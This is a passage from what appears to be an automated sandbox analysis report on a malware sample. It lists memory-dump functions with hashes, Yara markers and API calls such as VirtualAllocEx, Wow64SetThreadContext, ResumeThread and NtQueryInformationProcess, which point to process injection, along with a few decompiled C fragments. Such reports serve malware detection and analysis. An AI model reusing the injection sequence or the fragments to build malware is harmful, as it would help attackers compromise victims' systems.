                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002FC3F2
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: f0ab952ad51ab46a0215e35f6dddf2a2137fbdc0c6a9e59c00767b06fe189c8b
                                      • Instruction ID: 9c8b082c1eea6d29e0786784bfafd53df3e3651e1ba6969e6865180563b11451
                                      • Opcode Fuzzy Hash: f0ab952ad51ab46a0215e35f6dddf2a2137fbdc0c6a9e59c00767b06fe189c8b
                                      • Instruction Fuzzy Hash: AB41A6B4D0425C9FCF00CFA9D884AEEFBB1BB49310F20942AE915B7200D775A956CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 002FC0B8, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002FC162
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: df5e4452d8bebbdc2ec9f28434a4afd7a0fe5622b40e602b01ea4cda90373842
                                      • Instruction ID: 2b4c4e8ad0fbca8675cc034be8f05905d8afbcaae9760a7631c8ff491d7938a7
                                      • Opcode Fuzzy Hash: df5e4452d8bebbdc2ec9f28434a4afd7a0fe5622b40e602b01ea4cda90373842
                                      • Instruction Fuzzy Hash: FF41A8B4D0425C9BCF00CFA9D880AAEFBB1BB49310F20942AE915B7200D735A916CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 002FBF88, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 002FC037
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: ea3c3a145a5ed3deaca604cfb817d6a056d305e14c6157be2a5bba4ab9927b90
                                      • Instruction ID: c551901c907b139b5ec2a08a0b23a8052d2dc27728af9ae45951729dc3429adb
                                      • Opcode Fuzzy Hash: ea3c3a145a5ed3deaca604cfb817d6a056d305e14c6157be2a5bba4ab9927b90
                                      • Instruction Fuzzy Hash: 7D41BBB4D0525C9FCB10CFA9D884AEEFBB1AF49314F24842AE415B7240D779A946CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 002FBE98, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ResumeThread.KERNELBASE(?), ref: 002FBF16
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 15d5590bb307315ba549774f6e573774c7e28998c7dff401283c2bfb5a1c1783
                                      • Instruction ID: ebba8c5d1a764da891fb2f8502dee2aeb5dd01dedbfa72462b2952b6feabbf09
                                      • Opcode Fuzzy Hash: 15d5590bb307315ba549774f6e573774c7e28998c7dff401283c2bfb5a1c1783
                                      • Instruction Fuzzy Hash: 3F31D8B4D1421C9FCF14CFA9D884AAEFBB5AF49314F14842AE815B7300D735A906CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 022C084E, Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: fb8fd834593483cdb9cc01cda5767a4bdf8b61fa1e2a5acd50d705e15a2b4fcb
                                      • Instruction ID: 38874879b7f26533e1f368be6af7d6e0715deb4319fe96249119bfdee165f3e3
                                      • Opcode Fuzzy Hash: fb8fd834593483cdb9cc01cda5767a4bdf8b61fa1e2a5acd50d705e15a2b4fcb
                                      • Instruction Fuzzy Hash: AC41B27495162ECFEB34DFA5C948BECB7B1AB48305F1086EAC409AB2A4D7745AC4DF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 022C086B, Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: bf4fcb526e16e7384d808bbc66c02718da476e30cfc19739b08dbd7a5c18ddf5
                                      • Instruction ID: 888f4830b4b765257d1c15ab47f945070a5126955dd780192b3c62b6b515ee06
                                      • Opcode Fuzzy Hash: bf4fcb526e16e7384d808bbc66c02718da476e30cfc19739b08dbd7a5c18ddf5
                                      • Instruction Fuzzy Hash: B331D270D5422ACBEB24DFA5D948BEDB7B1BB09304F1081EAD009A7284D7759AC5DF11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 022C0C75, Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: 8739b3bcfe29bf4b2c9e60ba4cee18799985faae837be57cd369976faa77f344
                                      • Instruction ID: d65a191673ff87af1ccf80d9e927764f0ad50853694d346d265694b140108f4d
                                      • Opcode Fuzzy Hash: 8739b3bcfe29bf4b2c9e60ba4cee18799985faae837be57cd369976faa77f344
                                      • Instruction Fuzzy Hash: 8921D27095522ACFEB21DF94C948BE9B7B0FB09304F2092EAD409AB294D7754AC5CF11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 022C0930, Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: e79ccf06fa033d5bf4f5271e931d9831e672297b13ebad31f3dc85633f690f00
                                      • Instruction ID: e4f394e91fe94f2af31765d8ef04bc5493bd36b97637a5336445d3f393a91730
                                      • Opcode Fuzzy Hash: e79ccf06fa033d5bf4f5271e931d9831e672297b13ebad31f3dc85633f690f00
                                      • Instruction Fuzzy Hash: C021DE70C5522ACBEB34DFA4C949BECBBB0AB49300F1086EAD409A7294E7705EC0CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0023D01C, Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472482699.000000000023D000.00000040.00000001.sdmp, Offset: 0023D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 558dda5f5e9b8b9ff68b62a59a411da3682543e1934e4f9254992469b2959f57
                                      • Instruction ID: 99a57fca8a09b9ffa1b27f1d211a4eeff68cbbfa366c01de98cc6d79eceba9b2
                                      • Opcode Fuzzy Hash: 558dda5f5e9b8b9ff68b62a59a411da3682543e1934e4f9254992469b2959f57
                                      • Instruction Fuzzy Hash: EB2134B4618244DFCB18DF24E8C4B2ABB61FB88B14F34C569E9094B246C777D827CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0023D006, Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472482699.000000000023D000.00000040.00000001.sdmp, Offset: 0023D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 49f9e2ae041f7111d9af052405c55f1419efa1c1ad1922df7cfd26addc7cb6c7
                                      • Instruction ID: f84643121821ffd87b9231f542fadfa64e1e6ec4dcf800f1c71adbab8fa8cc1b
                                      • Opcode Fuzzy Hash: 49f9e2ae041f7111d9af052405c55f1419efa1c1ad1922df7cfd26addc7cb6c7
                                      • Instruction Fuzzy Hash: C7217FB54083809FCB06CF24D994B11BFB1EB46714F28C5DAD8458B266C33AD81ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0022D1C1, Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472471565.000000000022D000.00000040.00000001.sdmp, Offset: 0022D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 66dca0dfbbe6f2132ba696d3406e692937a18a9116e7ebbfbbc9a5fea4302474
                                      • Instruction ID: 8a46b799e8475a721352f4dcb4f45baa9c5119086001f1f60c7019843b99495d
                                      • Opcode Fuzzy Hash: 66dca0dfbbe6f2132ba696d3406e692937a18a9116e7ebbfbbc9a5fea4302474
                                      • Instruction Fuzzy Hash: 2601F731018764FADB508E55EC84B6BBB98DF51724F18C11AED085B183D3B4DC01C6B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0022D1C0, Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472471565.000000000022D000.00000040.00000001.sdmp, Offset: 0022D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 71f145d490e02d799e43773a6bc22275c08185a248433836dee5d0b3fbfd4bb3
                                      • Instruction ID: bd46d3770ba26f1bb298beac2dd06e722f4a50747877b4b5d26c873dae9398a4
                                      • Opcode Fuzzy Hash: 71f145d490e02d799e43773a6bc22275c08185a248433836dee5d0b3fbfd4bb3
                                      • Instruction Fuzzy Hash: E4F0AF31004658ABEB508E45D888B62FF98EF51724F18C55AED081A283C278DC40CAB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 022C0508, Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3b2be1ee90e5890930e65d7e05ce1e433e4f08f549b5f5496f5c3a2da885e308
                                      • Instruction ID: 78bf291943bce4bf931350a28cee1f49e6e3997d3c5da49a6f1924ba128fbf2e
                                      • Opcode Fuzzy Hash: 3b2be1ee90e5890930e65d7e05ce1e433e4f08f549b5f5496f5c3a2da885e308
                                      • Instruction Fuzzy Hash: FF01C471E10228CFDB24DFA5C981BEEBBB5AB49304F1444999109AB291C734AF84CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 022C1170, Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b741f8613f5efa07e17843d853995fb276e1aeeb44ee01a6ec8cdace8603e596
                                      • Instruction ID: 4237d28361b978935298eda27723fe2c0e7f5f0299c0bba441c1c3075d60d10d
                                      • Opcode Fuzzy Hash: b741f8613f5efa07e17843d853995fb276e1aeeb44ee01a6ec8cdace8603e596
                                      • Instruction Fuzzy Hash: 2BF09235904208FBCB05DFD8D941AADBBB5EB48314F20C199A91966362C772AA61EF81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 022C1258, Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8135a56587c3c9368b20ed9ea19a41c362ccc50159ba2a123580df33015e1421
                                      • Instruction ID: d5ed5b36bb35689a4a3a26f7576aa549c029f694cd462ae3bb105ef9e87369e9
                                      • Opcode Fuzzy Hash: 8135a56587c3c9368b20ed9ea19a41c362ccc50159ba2a123580df33015e1421
                                      • Instruction Fuzzy Hash: 8CE0E538904208EBCB04DFA9D4456ADFBB4AB89304F20C1AED848A3356D671AA51DF81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 022C12A8, Relevance: .0, Instructions: 20COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1b60a6d78f5e7546db4453c91bc526b4c6d930a548b7949539c1143c3a297c9
                                      • Instruction ID: 98ceada1eedb2a071388553513eff04963400b0cf8022836e638bf9777df157e
                                      • Opcode Fuzzy Hash: e1b60a6d78f5e7546db4453c91bc526b4c6d930a548b7949539c1143c3a297c9
                                      • Instruction Fuzzy Hash: 79E09A34E04108EBD704DFD8D9556ACFBB4EB89304F20C1AD9909A7356DB71AA55CF81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 002F63E7, Relevance: 3.9, Strings: 3, Instructions: 117COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: UUUU$b<H($j\z
                                      • API String ID: 0-364476664
                                      • Opcode ID: b895dd7824a59b5ee50e2e89ec418ec92274c999b29280bae8e0ba41466b2023
                                      • Instruction ID: 424e8fd0b3f27d0a2c2128b362ca66237deaa2ee3717653ebc4d0396a189658a
                                      • Opcode Fuzzy Hash: b895dd7824a59b5ee50e2e89ec418ec92274c999b29280bae8e0ba41466b2023
                                      • Instruction Fuzzy Hash: 29518070E146288FDBA4CFADC880B8DFBF2AF49340F1481A9D168E7206D7349A85CF11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 002F5918, Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: $]H$dWH
                                      • API String ID: 0-2474546164
                                      • Opcode ID: e300f6533cf1f6231af0fac4ea4b1aa311ce1cb120c8f2945a2a1ffdb5e11b68
                                      • Instruction ID: c65324824b44cc8e39dfe9baf152bf395d24fda8571f99cfd137fd07ed5aa7f7
                                      • Opcode Fuzzy Hash: e300f6533cf1f6231af0fac4ea4b1aa311ce1cb120c8f2945a2a1ffdb5e11b68
                                      • Instruction Fuzzy Hash: 1F619070D11258DFDB44EFB9E885AAD7BF2AB89304F11C539D104AF369DB74990A8F80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 002F5928, Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: $]H$dWH
                                      • API String ID: 0-2474546164
                                      • Opcode ID: a4dfb0b6d64e9ff32ed1fbd26ad9a399574b5d03a1cb73062b8d6fea7d1d3a19
                                      • Instruction ID: a027fcd8a23b756be2098c01de317b4f6f4f8745f7f7c3751342a04927e93b3f
                                      • Opcode Fuzzy Hash: a4dfb0b6d64e9ff32ed1fbd26ad9a399574b5d03a1cb73062b8d6fea7d1d3a19
                                      • Instruction Fuzzy Hash: DD516F70911218DFD744EFB9E885AAD7BF3AB89304F11C539D104AF368DB74990A8F90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 002F17B0, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: T\)
                                      • API String ID: 0-3225998666
                                      • Opcode ID: 072aee323c4abbc798480265c084c1e556318f659266a11215c4d1f77ad4667e
                                      • Instruction ID: 3ce3ebebac5aff77da956cce9d1f35af875d593fac08c15b33ce34700cdcec87
                                      • Opcode Fuzzy Hash: 072aee323c4abbc798480265c084c1e556318f659266a11215c4d1f77ad4667e
                                      • Instruction Fuzzy Hash: E3C1243192924ACBC7109F79C8902BAFBF1EF41340F6484BBE656DB292D3B49971C752
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 002F5B78, Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: e
                                      • API String ID: 0-4024072794
                                      • Opcode ID: a8fbb3490bfd5c20468e059314cc08ec247ac4c196d62e498b752971da4063ca
                                      • Instruction ID: 9848a0f67d9c88035daa6603d95d712bb464a95f4cb3c08047b7ba96d1d2a892
                                      • Opcode Fuzzy Hash: a8fbb3490bfd5c20468e059314cc08ec247ac4c196d62e498b752971da4063ca
                                      • Instruction Fuzzy Hash: 8C4150B1E016588BEB1CCF6B8D4079AFAF3AFC9300F14C1BA850DA6215EB7019858F15
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0008A2A9, Relevance: .9, Instructions: 896COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472375681.0000000000082000.00000020.00020000.sdmp, Offset: 00080000, based on PE: true
                                      • Associated: 00000004.00000002.472371422.0000000000080000.00000002.00020000.sdmp Download File
                                      • Associated: 00000004.00000002.472446674.0000000000132000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                      • Instruction ID: bd643360dd9d88dbfcd95590402147e20ff9165330c55df9eb09a8da1e0d777a
                                      • Opcode Fuzzy Hash: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                      • Instruction Fuzzy Hash: 8E62696144F7C19FD7534B746DB46E2BFB1AE6321871E44CBC4C0CE4A3E22A195AE722
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: vbc.exe PID: 1724 Parent PID: 3028 vbc.exeCOMMON

                                      Executed Functions

                                      Function 0036A036, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 481nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtQueryInformationProcess.NTDLL ref: 0036A19F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506274957.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID: 0
                                      • API String ID: 1778838933-4108050209
                                      • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                      • Instruction ID: db7438bc47bfb15f3901b093ed957552e1a7920b63d43e83b6334906ff288329
                                      • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                      • Instruction Fuzzy Hash: 63F14370918A4C8FDBA6EF68C894AEEB7E0FF98304F40462AE54EDB255DF349541CB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A41A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A465
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1JA$rMA$rMA
                                      • API String ID: 2738559852-782607585
                                      • Opcode ID: 9914dd337f64a7b31bf72df675d152d5713e268940301750ca92dcfaa6f04c6d
                                      • Instruction ID: 7c38d89ab93df81105f2114b4883131f6cf40875b4705179c94253e06e298a16
                                      • Opcode Fuzzy Hash: 9914dd337f64a7b31bf72df675d152d5713e268940301750ca92dcfaa6f04c6d
                                      • Instruction Fuzzy Hash: D9F0E2B6204109ABCB08DF99CC80EEB77AAAF8C754F058259BE0D97251D634E8518BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A420, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E0041A420(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF70(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                      0x0041a423
                                      0x0041a42f
                                      0x0041a437
                                      0x0041a43c
                                      0x0041a442
                                      0x0041a45d
                                      0x0041a465
                                      0x0041a469

                                      APIs
                                      • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A465
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1JA$rMA$rMA
                                      • API String ID: 2738559852-782607585
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: 853ae5a9cbf7dd52acbc9bf2bbd942333817209f7ae892279ddd8fb5cf099807
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: EBF0A4B6200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97251D630E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0036A042, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtQueryInformationProcess.NTDLL ref: 0036A19F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506274957.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID: 0
                                      • API String ID: 1778838933-4108050209
                                      • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                      • Instruction ID: 554ca5438b3b4d5663259802956e58d960a9efcde48863f309140353af1fdd9a
                                      • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                      • Instruction Fuzzy Hash: 4F515D70918A8C8FDBA9EF68C8946EEBBF0FB98305F40462ED44AD7215DF309645CB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A36B, Relevance: 1.6, APIs: 1, Instructions: 83filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 16%
                                      			E0041A36B(void* __eax, void* __ecx, void* __edi, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {
				void* _v0;

				asm("aad 0x62");
				_push(ds);
				if (__eflags < 0) goto L3;
			}




                                      0x0041a36c
                                      0x0041a36e
                                      0x0041a36f

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3BD
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 25e10beb385e0c8ad6e5b093bc203bfc984318efcd2ba0e606d3956a370f58f9
                                      • Instruction ID: f13a7f2ed15b10cc941d6ce38a6d9b22506d6a01a518b2f66292f6644dc746c6
                                      • Opcode Fuzzy Hash: 25e10beb385e0c8ad6e5b093bc203bfc984318efcd2ba0e606d3956a370f58f9
                                      • Instruction Fuzzy Hash: 2B21F5B6201208AFCB08CF99DC91EEB77A9EF8C754F15864DFA0D97251C630E851CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0040ACF0(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041CC60( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D080(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D300(__ebx,  &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E0041B4B0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                      0x0040ad0c
                                      0x0040ad0f
                                      0x0040ad14
                                      0x0040ad19
                                      0x0040ad23
                                      0x0040ad28
                                      0x0040ad2b
                                      0x0040ad2d
                                      0x0040ad35
                                      0x0040ad3a
                                      0x0040ad3a
                                      0x0040ad41
                                      0x0040ad49
                                      0x0040ad4c
                                      0x0040ad4e
                                      0x0040ad62
                                      0x00000000
                                      0x0040ad64
                                      0x0040ad6a
                                      0x0040ad1e
                                      0x0040ad1e
                                      0x0040ad1e

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                                      • Instruction ID: 36d4d6e408e5d2a0d8ad193a5268f308b8346a18828ed8d7c7f2542abd93b906
                                      • Opcode Fuzzy Hash: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                                      • Instruction Fuzzy Hash: 3C015EB5D4020DABDB10DBA1DC42FDEB3789F54308F0041AAE908A7281F634EB548B96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A370, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3BD
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: db220115459d8e284863bd9c0c46ad68448eb9d788840dc0e4734df984f4989a
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: C3F0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A550, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
